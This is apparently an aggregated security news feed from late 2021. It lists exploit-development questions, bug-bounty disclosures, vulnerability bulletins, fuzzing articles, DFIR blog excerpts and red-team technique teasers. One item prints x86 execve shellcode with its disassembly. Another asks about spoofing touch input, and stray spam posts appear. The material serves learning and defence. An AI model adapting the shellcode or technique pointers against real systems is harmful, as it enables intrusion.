    Making millions have been a problem for Welley Christ he needs a record label viral topic about Welley Christ trending topic about Welley… Continue reading on Medium »  ( 1 min )
  • Open

    Is passing data to a driver a collection of loads/Mov instructions?
    submitted by /u/WillyRaezer [link] [comments]
    Android touch input spoofing?
    How could I spoof the input to the touch screen on any app using regular code and not already root? submitted by /u/WillyRaezer [link] [comments]
  • Open

    The SANS/CWE Top 25 dangerous software errors of 2021
    Since we last looked at it in 2019, the SANS/CWE Top 25 list has been updated twice. Let’s see what this year’s SANS Top 25 tells us about the state of software security in 2021 and how it relates to the latest OWASP Top 10. READ MORE  ( 6 min )
  • Open

    Privilege Escalation leads to trash other users comment without having admin rights.
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1307943 - Bounty: $200
    Stored XSS on https://community.my.games/ (Add Post)
    Mail.ru disclosed a bug submitted by c1kada: https://hackerone.com/reports/755322
    Reflected XSS in photogallery component on [https://market.av.ru]
    Azbuka Vkusa disclosed a bug submitted by haxta4ok00: https://hackerone.com/reports/988271 - Bounty: $100
    .....
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/505336 - Bounty: $200

  • Open

    【安全通报】泛微E-Office文件上传漏洞(CNVD-2021-49104)
    近日,网络上出现 泛微E-Office 文件上传漏洞(CNVD-2021-49104)在野利用事件,攻击者可通过该漏洞在影响...
  • Open

    Paid CTF partner
    Hi, Am doing a couple of CTFs next Sunday and Monday, and I have a shortage in Pwn and reverse fields. If you're interested in helping me through the CTF in these challenges and earning some quick money for each one you help solve, let me know or message me. Note : I can cover all other categories, and know the basics of pwn and reverse but I don't have a team that's why am asking for help. and as I know everyone is busy working or studying, I offered money for each challenge solved so it doesn't become waste of time for whoever wanna help. submitted by /u/riskyg33k [link] [comments]  ( 1 min )
  • Open

    AbuseHumanDB — HackTheBox Write-Up
    En el primer post de este blog vamos a examinar un challenge de Hack The Box llamado “AbuseHumanDB” y como efectuar un Blind XS Leak+ CORS… Continue reading on Medium »  ( 2 min )

  • Open

    Execve shellcode not working
    global _start start: ; =================== EXECVE ====================== ; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md xor eax, eax mov al, 11 ; execve sys call no 11 xor edx, edx ; reverse the command string and store it /bin/bash/0 push edx ; push the null of the string push 0x686c6c61 ; this shit represent ls -allh in reverse and connverted to hex push 0x2d20736c mov ebx, esp ;sec arg to the execve is the pointer to the strin to execve mov ecx, edx ; mov 3rd arg to execve can be null int 0x80 ;================= EXIT PROGRAM ===================== ; exit = sys call no 1 -> must go to eax ; args to sys call is return code of the program -> must go to ebx ;xor eax, eax ; eax = 0 ;add eax, 1 ; eax = 1 ;xor ebx, ebx ; ebx = 0 ;add bl, 4 ;inc ebx ;int 0x80 see the push edx then next 2 instruction, its a command ls -allh command this command isnt executing, but /bin//sh is working with this. is their any problem with this. running program, sh is a program too its working but ls with args. ;;;;;; after compiling and dumping with objdump ;;;;;;;;; ld: warning: cannot find entry symbol _start; defaulting to 0000000008049000 f_output: file format elf32-i386 Disassembly of section .text: 08049000 : 8049000: 31 c0 xor eax,eax 8049002: b0 0b mov al,0xb 8049004: 31 d2 xor edx,edx 8049006: 52 push edx 8049007: 68 61 6c 6c 68 push 0x686c6c61 804900c: 68 6c 73 20 2d push 0x2d20736c 8049011: 89 e3 mov ebx,esp 8049013: 89 d1 mov ecx,edx 8049015: cd 80 int 0x80 ​ submitted by /u/dude_sourav [link] [comments]  ( 3 min )
  • Open

    Threat Hunting, IRL
    While I worked for one company, I did a lot of public speaking on the value of threat hunting. During these events, I met a lot of folks who were interested to learn what "threat hunting" was, and how it could be of value to them. I live in a very rural area, on just shy of 19 acres. One neighbor has 15 acres up front and another 20 in the back, and he adjoins a large property with just a trailer. My neighbor on the other side has 19 acres of...just 19 acres. We have animals, as well as more than a few visitors, which makes for a great analogy for threat hunting. Within the borders of my property, we have three horses and a mini-donkey, and we have different paddocks and fields for them. We can restrict them to certain areas, or allow them to roam freely. We do this at different times o…  ( 6 min )

  • Open

    New differential fuzzing tool reveals novel HTTP request smuggling techniques
    Article URL: https://portswigger.net/daily-swig/new-differential-fuzzing-tool-reveals-novel-http-request-smuggling-techniques Comments URL: https://news.ycombinator.com/item?id=29342944 Points: 169 # Comments: 33  ( 4 min )

  • Open

    Long names and muscle memory?
    Hi I have a general programming question, I have tendency to like short and sweet code, but many platforms/libraries have more obtuse names etc. Is it common to build muscle memory when typing out longer names etc.? I noticed Windows land code is pretty obtuse. submitted by /u/WillyRaezer [link] [comments]  ( 1 min )
  • Open

    Building a secure SDLC for web applications
    A predictable and efficient software development lifecycle (SDLC) is crucial for delivering modern web applications on schedule, in scope, and within budget. Building security into the application lifecycle is not an easy task, so let’s see how you can integrate application security best practices to create a secure software development life cycle. READ MORE  ( 6 min )

  • Open

    Tips for DFIR Analysts, pt. V
    Over the years, I've seen DFIR referred to in terms of special operations forces. I've seen incident response teams referred to as "Cyber SEALs", as well as via various other terms. However, when you really look at, incident response is much more akin to the US Army Special Forces, aka "Green Berets"; you have to "parachute in" to a foreign environment, and quickly develop a response capability making use of the customer's staff ("the natives"), all of whom live in a "foreign culture". As such, IR is less about "direct action" and "hostage rescue", and more about "foreign internal defense". Analysis occurs when an analyst applies their knowledge and experience to data, and is usually predicated by a parsing phase. We can learn a great deal about the analyst's level of knowledge and experie…  ( 7 min )
  • Open

    Fuzzing with Scapy: Introduction to Network Protocol Fuzzing (DNS & TCP packets)
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Explaining Basic DOM Clobbering And The Tag
    Or if you’re stuck on PortSwigger’s DOM Clobbering labs Continue reading on Medium »
    Intigriti’s November XSS challenge By @IvarsVids
    This one is by far one of the hardest challenges that I’ve done. The solution is not as intended but it does include some pretty nice… Continue reading on Medium »  ( 5 min )
  • Open

    Source code audit or methodology to find potential Memory corruption in low level language in c/c++ and Assembly.
    Hi , I am beginner to Vulnerability research. Have some experience in ctf and exploit challenges. The problem that I am facing challenges while auditing code either in c/c++ or Assembly manually. I missed many points while searching potential candidates for memory corruption or other logical vulnerabilities. Let’s say I am analysing c++ developed binary in IDA . So I want to know some advice or any tutorials or books to achieve them . Also in windbg crash let’s say there is a crash happened. How to determine which classes of vulnerability it is. .please let me know guys . Thanks. submitted by /u/crypt3r [link] [comments]  ( 2 min )

  • Open

    The "serial offender" #sexually assaulted an innocent minor girl and fled the scene.
    #Sexually assaulted an innocent minor #girl Continue reading on Medium »  ( 1 min )

  • Open

    A bit confused about the jmpcall function in PEDA w/ ASLR but no PIE (x64/Linux)
    Brushing up on some x64 exploitation, and going through some exercises, I am confused by this: When I find jmp esp in a non-PIE enabled binary (using gdb-peda), the location does not seem to change, and is only 3 bytes (with ASLR on). This works fine to execute my shellcode if I pad it out with nulls. What I am confused about is, why is it only 3 bytes? And why is it constant? Is ASLR only randomizing buffer space and not where the .code is loaded? Is an ASLR enabled binary in Windows then the equivalent of Linux ASLR + PIE? Are the 3 bytes just a relative offset? gdb-peda$ jmp esp 0x40061e : jmp rsp 0x400743 : call rsp 0x60061e : jmp rsp 0x600743 : call rsp submitted by /u/Bahariasaurus [link] [comments]  ( 2 min )
  • Open

    【安全通报】Metabase 敏感信息泄露漏洞(CVE-2021-41277)
    近日,metabase 爆出敏感信息泄露漏洞,该漏洞 CVSS3 评分高达 9.9。攻击者可在未经身份验证的情况下获取系统敏感信息。

  • Open

    The secret to getting results, not noise, from your DAST solution
    Products for dynamic application security testing (DAST) vary widely in quality and capabilities. A low-quality tool that merely ticks a box will do little to improve security and may generate more work than it saves. But a mature, high-quality solution can bring measurable security improvements and serve as a solid foundation for your entire AppSec program, as our infographic shows. READ MORE  ( 3 min )
  • Open

    Exploiting Predictable PRNG Seeds (with PwnTools, incl binary patching)
    submitted by /u/_CryptoCat23 [link] [comments]

  • Open

    security researcher assistant
    Hello folks, I am looking for an internship in exploitdev or vulnerability research. I am not looking for any revenue I just need a practical experience. Is there a way to find an internship in such a field as non-american? submitted by /u/botta633 [link] [comments]  ( 1 min )
    Is it still worth it to read The Shellcoder’s Handbook?
    I've been meaning to get into exploit dev and i know that The Shellcoder’s Handbook is recommended but does it still hold up in 2021? submitted by /u/milkshakemahn [link] [comments]  ( 1 min )

  • Open

    Threat actors offer millions for zero-days, developers talk of exploit-as-a-service
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    【安全通报】Apache ShenYu Admin 身份验证绕过漏洞(CVE-2...
    近日,Apache ShenYu Admin爆出身份验证绕过漏洞,攻击者可通过该漏洞绕过JSON Web Token (JWT)安全认证,直接进入系统后台。  ( 1 min )
  • Open

    Burp Suite certification prices hacked for Black Friday
    For the very first time, we've decided to join the rest of the world and run a Black Friday offer. Between 16 November 2021 and 30 November 2021, you can buy our Burp Suite Certified Practitioner exam  ( 4 min )

  • Open

    【安全通报】Hadoop Yarn RPC服务未授权访问漏洞
    近日,网络上出现 Hadoop Yarn RPC 服务未授权访问漏洞的在野利用事件,攻击者可在未经过身份验证的情况下通过该漏洞在影响主机执行任意命令。  ( 1 min )
  • Open

    How to generate millions of files using grammar-based fuzzing (FormatFuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Vulnerability scanning with PAM in zero trust environments
    Never trust, always check – that’s the zero trust motto. Enterprises and government agencies alike are rushing to implement at least some zero trust technologies, notably privileged access management (PAM), but this may have a knock-on effect on application security testing. Learn how modern AppSec solutions integrate with PAM platforms to ensure accurate testing even in locked-down environments. READ MORE  ( 4 min )

  • Open

    Show HN: OpenAPI fuzzer – fuzzing APIs based on OpenAPI specification
    Article URL: https://github.com/matusf/openapi-fuzzer Comments URL: https://news.ycombinator.com/item?id=29231804 Points: 76 # Comments: 22  ( 3 min )
  • Open

    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )
    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )

  • Open

    picoCTF - Here's a Libc Writeup
    submitted by /u/YioUio [link] [comments]

  • Open

    Breaking into exploit dev
    I am a security engineer looking to break into exploit dev. Background: I do not have a CS degree, although I went to school for CS. While in school I was captain of our collegiate hacking team. I held sessions where we practiced (beginner) buffer overflows. While in school I had done research on hardware reverse engineering, focused on medical devices. That got me to present with my peers at our local bsides. I then was able to present at IEEE southeastcon, which got me a job as a security engineer before graduating. -----‐ 1) Is it possible to get into exploit dev without a degree or is it absolutely necessary? 2) should I go the pentester route and then exploit dev? 3) do you see security engineers break into this field or does it tend to be developers? I don't do any software engineering, but I do a lot of tooling in powershell, python, and recently, go. I know C but hardly. 4) should I just shaddup and start learning? I'd assume that's get a better grip on primitives, RoP and C. submitted by /u/xnrkl [link] [comments]  ( 3 min )
    Binary Exploitation (Pwn) Challenge Walkthroughs - HackTheBox x Synack #RedTeamFive CTF
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    Fuzzware: Using Precise MMIO Modeling for Effective Firmware Fuzzing – Usenix
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/scharnowski Comments URL: https://news.ycombinator.com/item?id=29198875 Points: 2 # Comments: 0  ( 2 min )

  • Open

    ClusterFuzzLite: Continuous Fuzzing for All
    Article URL: https://security.googleblog.com/2021/11/clusterfuzzlite-continuous-fuzzing-for.html Comments URL: https://news.ycombinator.com/item?id=29188664 Points: 15 # Comments: 3  ( 3 min )
  • Open

    【安全通报】PAN GlobalProtect Portal 内存损坏漏洞(CVE-...
    近日,Palo Alto Networks (PAN) 发布安全公告,修复了Palo Alto Networks GlobalProtect portal 和 gateway interfaces 中的内存损坏漏洞。未经身份验证的攻击...  ( 1 min )

  • Open

    Asking Github Copilot to write Fuzzers & Hacking code for me - Hacking with AI
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Nyx-Net: Network Fuzzing with Incremental Snapshots
    Article URL: https://arxiv.org/abs/2111.03013 Comments URL: https://news.ycombinator.com/item?id=29116464 Points: 2 # Comments: 0  ( 2 min )

  • Open

    Decrypt As If Your Security Depends on It
    Encryption has reached near-full adoption by internal teams hoping to implement stronger security and privacy practices. Simultaneously, attackers are using the same mechanisms to hide their malicious activity from the defender’s line of sight. According to the Ponemon Institute’s 2021 Global Encryption Trends Study, 50% of organizations have an encryption plan consistently applied across their […] The post Decrypt As If Your Security Depends on It appeared first on Security Weekly.  ( 2 min )

  • Open

    Tips for DFIR Analysts, pt IV
    Context is king, it makes all the difference. You may see something run in EDR telemetry, or in logs, but the context of when it ran in relation to other activities is often critical. Did it occur immediately following a system reboot or a user login? Does it occur repeatedly? Does it occur on other systems? Did it occur in rapid succession with other commands, indicating that perhaps it was scripted? The how and when of the context then leads to attribution. Andy Piazza brings the same thoughts to CTI in his article, "CTI is Better Served with Context". Automation can be a wonderful thing, if you use it, and use it to your advantage. The bad guys do it all the time. Automation means you don't have to remember steps (because you will forget), and it drives consistency and efficiency. Even …  ( 6 min )

  • Open

    Improvements to Burp Suite authenticated scanning
    Burp Suite's authenticated scanning feature enables users to scan privileged areas of target web applications even when a complex login sequence is required. This leverages Burp's browser - using the  ( 4 min )

  • Open

    Autofuzz – Fuzzing Java Without Writing Fuzz Targets
    Article URL: https://fuzz.ci/jazzer/update/2.0 Comments URL: https://news.ycombinator.com/item?id=29013958 Points: 3 # Comments: 1  ( 2 min )

  • Open

    DevSecOps Scanning Challenges & Tips
    There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […] The post DevSecOps Scanning Challenges & Tips appeared first on Security Weekly.  ( 2 min )

  • Open

    An Intro to Fuzzing (a.k.a. Fuzz Testing)
    Article URL: https://labs.bishopfox.com/tech-blog/an-intro-to-fuzzing-aka-fuzz-testing Comments URL: https://news.ycombinator.com/item?id=28988478 Points: 4 # Comments: 0  ( 14 min )

  • Open

    Security Fuzzing Podcast Episode
    Article URL: https://anchor.fm/firo-solutions/episodes/Fuzzing-with-Patrick-Ventuzelo-e197t6c Comments URL: https://news.ycombinator.com/item?id=28977322 Points: 4 # Comments: 0  ( 23 min )

  • Open

    Get Burp Suite certified for free...
    Ready for the challenge? Buy your certification exam now... Burp Suite Certified Practitioner accreditation to enable our users to validate their self-taught skills as web security prac  ( 3 min )

  • Open

    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )
    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )

  • Open

    Fuzzing-101: learn how to fuzz like a real expert
    Article URL: https://github.com/antonio-morales/Fuzzing101 Comments URL: https://news.ycombinator.com/item?id=28923466 Points: 4 # Comments: 0  ( 3 min )
    The Challenges of Fuzzing 5G Protocols
    Article URL: https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/ Comments URL: https://news.ycombinator.com/item?id=28917943 Points: 5 # Comments: 0  ( 11 min )
    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://github.com/google/fuzzing/blob/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28916409 Points: 1 # Comments: 0  ( 1 min )
    Autofuzz – Java fuzzing without writing fuzz targets
    Article URL: https://blog.code-intelligence.com/autofuzz Comments URL: https://news.ycombinator.com/item?id=28915778 Points: 3 # Comments: 1  ( 2 min )
  • Open

    It Should Be ‘Cybersecurity Culture Month’
    It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture.That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly.“If your security awareness program […] The post It Should Be ‘Cybersecurity Culture Month’ appeared first on Security Weekly.  ( 2 min )

  • Open

    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://raw.githubusercontent.com/google/fuzzing/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28909004 Points: 11 # Comments: 0  ( 41 min )
  • Open

    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )
    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )

  • Open

    The Power of Developer-First Security
    Developers want to write good code. Secure code. Tools that optimize developer workflows for handling security issues can take a large burden off security practitioners and make triaging, understanding, prioritizing, and resolving vulnerabilities much easier and faster for the developer. That’s what DevSecOps is all about. One company that has developed such tools is GitLab. […] The post The Power of Developer-First Security appeared first on Security Weekly.  ( 2 min )

  • Open

    Data Exfiltration, Revisited
    I've posted on the topic of data exfiltration before (here, etc.) but often it's a good idea to revisit the topic. After all, it was almost two years ago that we saw the first instance of ransomware threat actors stating publicly that they'd exfiltrated data from systems, using this a secondary means of extortion. Since then, we've continued to see this tactic used, along with other tertiary means of extortion based on data exfiltration. We've also seen several instances where the threat actor ransom notes have stated that data was exfiltrated but the public "shaming" sites were noticeably empty. As long as I've been involved in what was first referred to as "information security" (later referred to as "cyber security"), data exfiltration has been a concern to one degree or another, even i…  ( 5 min )

  • Open

    Show HN: Prebuilt gotip releases for quickly trying out Go 1.18 fuzzing/generics
    Article URL: https://github.com/clean8s/gotip-built Comments URL: https://news.ycombinator.com/item?id=28810470 Points: 4 # Comments: 0  ( 2 min )

  • Open

    Tips for DFIR Analysts, pt III
    Learn to think critically. Don't take what someone says as gospel, just because they say it. Support findings with data, and clearly communicate the value or significance of something. Be sure to validate your findings, and never rest your findings on a single artifact. Find an entry for a file in the AmCache? Great. But does that mean it was executed on the system? No, it does not...you need to validate execution with other artifacts in the constellation (EDR telemetry, host-based effects such as an application prefetch file, Registry modifications, etc.). Have a thorough process, one that you can add to and extend. Why? Because things are always changing, and there's always something new. If you can automate your process, then so much the better...you're not loosing time and enabling…  ( 7 min )
    EDR Bypasses
    During my time in the industry, I've been blessed to have opportunities to engage with a number of different EDR tools/frameworks at different levels. Mike Tanji offered me a look at Carbon Black before carbonblack.com existed, while it still used an on-prem database. I spent a very good deal of time working directly with Secureworks Red Cloak, and I've seen CrowdStrike Falcon and Digital Guardian's framework up close. I've seen the birth and growth of Sysmon, as well as MS's "internal" Process Tracking (which requires an additional Registry modification to record full command lines). I've also seen Nuix Adaptive Security up close (including seeing it used specifically for threat hunting), which rounds out my exposure. So, I haven't seen all tools by any stretch of the imagination, but mor…  ( 6 min )

  • Open

    Fuzzing with Postman
    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )
  • Open

    Fuzzing with Postman
    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )

  • Open

    JavaScript Test Case Generator Based on Branch Coverage and Fuzzing
    Article URL: https://slashdot.org/submission/14707493/javascript-test-case-generator-based-on-branch-coverage-and-fuzzing Comments URL: https://news.ycombinator.com/item?id=28745108 Points: 1 # Comments: 1  ( 3 min )

  • Open

    /r/netsec's Q4 2021 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 26 min )

  • Open

    Burp Suite Professional: feature roundup
    The modern web is an increasingly complex beast. Each passing year brings with it new frameworks, technologies, and design trends - not to mention vulnerabilities. All of this adds to your testing wor  ( 6 min )

  • Open

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )
  • Open

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )

  • Open

    Imposter Syndrome
    Imposter Syndrome.  This is something many of us have experienced to one degree or another, at various times. Many have experienced, some have overcome it, others may not be able to and wonder why. HealthLine tells us, "Imposter feelings represent a conflict between your own self-perception and the way others perceive you." I would modify that slight to, "...the way we believe others perceive us." Imposter syndrome is something internalized, and has very little to do with the outside world. I wanted to take the opportunity to share with you, the reader, what I've learned over the years about what's really happening in the world when we're having those feelings of imposter syndrome. Perception: I don't want to present at a conference, or ask a question at a conference, because everyone know…  ( 6 min )

  • Open

    Dev.fuzz (fuzzing) merged in Golang tip
    Article URL: https://github.com/golang/go/commit/6e81f78c0f1653ea140e6c8d008700ddad1fa0a5 Comments URL: https://news.ycombinator.com/item?id=28604475 Points: 2 # Comments: 0  ( 7 min )
    Native fuzzing will be in Go 1.18
    Article URL: https://twitter.com/katie_hockman/status/1440082486692773897 Comments URL: https://news.ycombinator.com/item?id=28602233 Points: 1 # Comments: 0  ( 1 min )

  • Open

    Building a More Secure AppDev Process
    Enterprises that integrate security testing into their CI/CD pipeline fix 91.4 percent of new issues, according to a progress report from ShiftLeft. Recent software supply chain attacks illustrate the growing risks businesses, their partners, and customers face. But a recent report suggests better outcomes for those who put security at the heart of app development. Data from […] The post Building a More Secure AppDev Process appeared first on Security Weekly.  ( 2 min )
  • Open

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )
  • Open

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )

  • Open

    Distros and RegRipper
    Over the years, every now and then I've taken a look around to try to see where RegRipper is used. I noticed early on that it's included in several security-oriented Linux distros. So, I took the opportunity to compile some of the links I'd found, and I then extended those a bit with some Googling. I will admit, I was a little surprised to see how, over time, how far RegRipper has gone, from a "here, look at this" perspective. Not all of the below links are current, some are several years old. As such, they are not the latest and greatest; however, they may still apply and they may still be useful/valuable. RegRipper on Linux (Distros)  Kali, Kali GitLab  SANS SIFT  CAINE   Installing RegRipper on Linux  Install RRv2.8 on Ubuntu  CentOS RegRipper package  Arch Linux   RegRipper Docker Imag…  ( 5 min )
    On Writing DFIR Books, pt II
    Part I of this series kicked things off for us, and honestly I have no idea how long this series will be...I'm just writing the posts without a specific plan or outline for the series. In this case, I opted to take an organic approach, and wanted to see where it would go. Content Okay, so you have an idea for a book, but about...what? You may have a title or general idea, but what's the actual content you intend to write about? Is it more than a couple of paragraphs; can you actually create several solid chapters without having to use a lot of filler and fluff? Back when I was actively writing books, this was something on the forefront of my mind, not only because I was writing books, but later I got a question or two from others along these lines. In short, I write about stuff I know, or …  ( 5 min )

  • Open

    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )

  • Open

    Account Persistence – Certificates
    It is not uncommon organizations to implement an internal certification authority in order to establish trust between entities (users, computers etc.) or utilize it for… Continue reading → Account Persistence – Certificates  ( 7 min )

  • Open

    Tips for DFIR Analysts, pt II
    On the heels of my first post with this subject, I thought I'd continue adding tips as they came to mind... I've been engaged with EDR frameworks for some time now. I first became aware of Carbon Black before it was "version 1.0", and before "carbonblack.com" existed. Since then, I've worked for several organizations that developed EDR frameworks (Secureworks, Nuix, CrowdStrike, Digital Guardian), and others that made use of frameworks created by others. I've also been very happy to see the development and growth of Sysmon, and used it in my own testing. One thing I've been acutely aware of is the visibility afforded by EDR frameworks, as well as the extent of that visibility. This is not a knock against these tools...not at all. EDR frameworks and tools are incredibly powerful, but they a…  ( 5 min )
    On Writing DFIR Books, pt I
    During my time in the industry, I've authored 9 books under three imprints, and co-authored a tenth. There, I said it. The first step in addressing a problem is admitting you have one. ;-) Seriously, though, this is simply to say that I have some experience, nothing more. During the latter part of my book writing experience, I saw others who wanted to do the same thing, but ran into a variety of roadblocks, roadblocks I'd long since navigated. As a result, I tried to work with the publisher to create a non-paid liaison role that would help new authors overcome many of those issues, so that a greater portfolio of quality books became available to the industry. By the time I convinced one editor of the viability and benefit of such a program, they had decided to leave their profession, and I…  ( 7 min )

  • Open

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »
  • Open

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »

  • Open

    Web App and API Security Needs to Be Modernized: Here’s How
    Applications are critical for doing business. They are also the weakest links in many an organization’s security chain. Many APIs continue to expose the personally identifiable information of customers, employees and contractors. As OWASP (Open Web Application Security Project) notes on its API Security Project homepage: “By nature, APIs expose application logic and sensitive data […] The post Web App and API Security Needs to Be Modernized: Here’s How appeared first on Security Weekly.  ( 2 min )

  • Open

    Building a Career in CyberSecurity
    There's been a lot of discussion on social media around how to "break into" the cybersecurity field, not only for folks just starting out but also for those looking for a career change. This is not unusual, given what we've seen in the public news media around cyber attacks and ransomware; the idea is that cybersecurity is an exploding career field that is completely "green fields", with an incredible amount of opportunity. Jax Scott recently shared a YouTube video (be sure to comment and subscribe!) where she provides five steps to level up any career, based on her "must read for anyone seeking a career in cybersecurity" blog post. Jax makes a lot of great points, and rather than running through each one and giving my perspective, I thought I'd elaborate a bit on one in particular. Jax's …  ( 4 min )

  • Open

    Tips for DFIR Analysts
    Over the years as a DFIR analyst...first doing digital forensics analysis, and then incorporating that analysis as a component of IR activity...there have been some stunningly simple truths that I've learned, truths that I thought I'd share. Many of these "tips" are truisms that I've seen time and time again, and recognized that they made much more sense and had more value when they were "named". Tips, Thought, and Stuff to Think About Computer systems are a finite, deterministic space. The adversary can only go so far, within memory or on the hard drive. When monitoring computer systems and writing detections, the goal is not write the perfect detection, but rather to force the adversary into a corner, so that no matter what they do, they will trigger something. So, it's a good thing to…  ( 9 min )
  • Open

    Burp extensions added to Burp Suite Enterprise Edition
    Burp Extensions (and your own custom extensions) will now be supported by Burp Suite Enterprise Edition, brand new for the 2021.8 release. If you've had much experience with Burp Suite Professional, i  ( 5 min )

  • Open

    It's now easier than ever to scan at scale with Burp Suite Enterprise Edition
    774 organizations in 68 countries are now using Burp Suite Enterprise Edition to improve and scale security across their web portfolios. As we pass the three-year anniversary of development on Burp Su  ( 4 min )

  • Open

    The history of OAST in Burp Suite
    At PortSwigger, we pride ourselves on pushing the boundaries of web security. Just take a peek at some of our researchers' recent and upcoming talks from the likes of Black Hat and DEF CON if you'd li  ( 4 min )
  • Open

    Domain Escalation – PrintNightmare
    Printers are part of every corporate infrastructure therefore Windows environments they have a number of embedded drivers installed. The Print Spooler (spoolsv.exe) service is responsible… Continue reading → Domain Escalation – PrintNightmare  ( 5 min )

  • Open

    HiveNightmare
    The security account manager (SAM) file contains the password hashes of the users on a Windows system. Since it is considered a sensitive file SYSTEM… Continue reading → HiveNightmare  ( 6 min )

  • Open

    “En-pass” — TryHackme Walkthrough (Medium Level CTF)
    Bu odada bizden web sitesi içerisinde gizlenmiş Path’i bulmamız isteniyor. Bulduğumuz pathlerden edindiğimiz bilgilerle makineyi çözmemiz… Continue reading on Medium »  ( 5 min )
  • Open

    “En-pass” — TryHackme Walkthrough (Medium Level CTF)
    Bu odada bizden web sitesi içerisinde gizlenmiş Path’i bulmamız isteniyor. Bulduğumuz pathlerden edindiğimiz bilgilerle makineyi çözmemiz… Continue reading on Medium »  ( 5 min )

  • Open

    How The Best Defense Gets Better: Part 2
    For many enterprises, incident response is an exercise in chaos. Security teams scramble to figure out how a data breach happened and crash into brick walls as they try to collect information from different departments that are often siloed from everyone else. It doesn’t have to be that way. Advanced security teams have learned that […] The post How The Best Defense Gets Better: Part 2 appeared first on Security Weekly.  ( 2 min )

  • Open

    Posting limits have been enabled on r/opendirectories.
    I'm not going to name any names, but because of many complaints of too many threads being created in a short time period by one user, we have set a limit of 2 5 posts per hour for any one user. This is not for comments, just new posts. Let us know if the limit is set too high or too low and we can adjust it if enough people agree. thanks, Your Loving Mods. edit: after reading the comments, the posting rate has been adjusted to 5 posts per user per hour. submitted by /u/MrDorkESQ [link] [comments]  ( 4 min )

  • Open

    HYBRID HACKER SUMMER CAMP 2021 GUIDE — Part Five: FuzzCON
    Welcome to the DEFCON 201 guide to Hybrid Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »  ( 8 min )
  • Open

    HYBRID HACKER SUMMER CAMP 2021 GUIDE — Part Five: FuzzCON
    Welcome to the DEFCON 201 guide to Hybrid Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »  ( 8 min )
  • Open

    Universal Privilege Escalation and Persistence – Printer
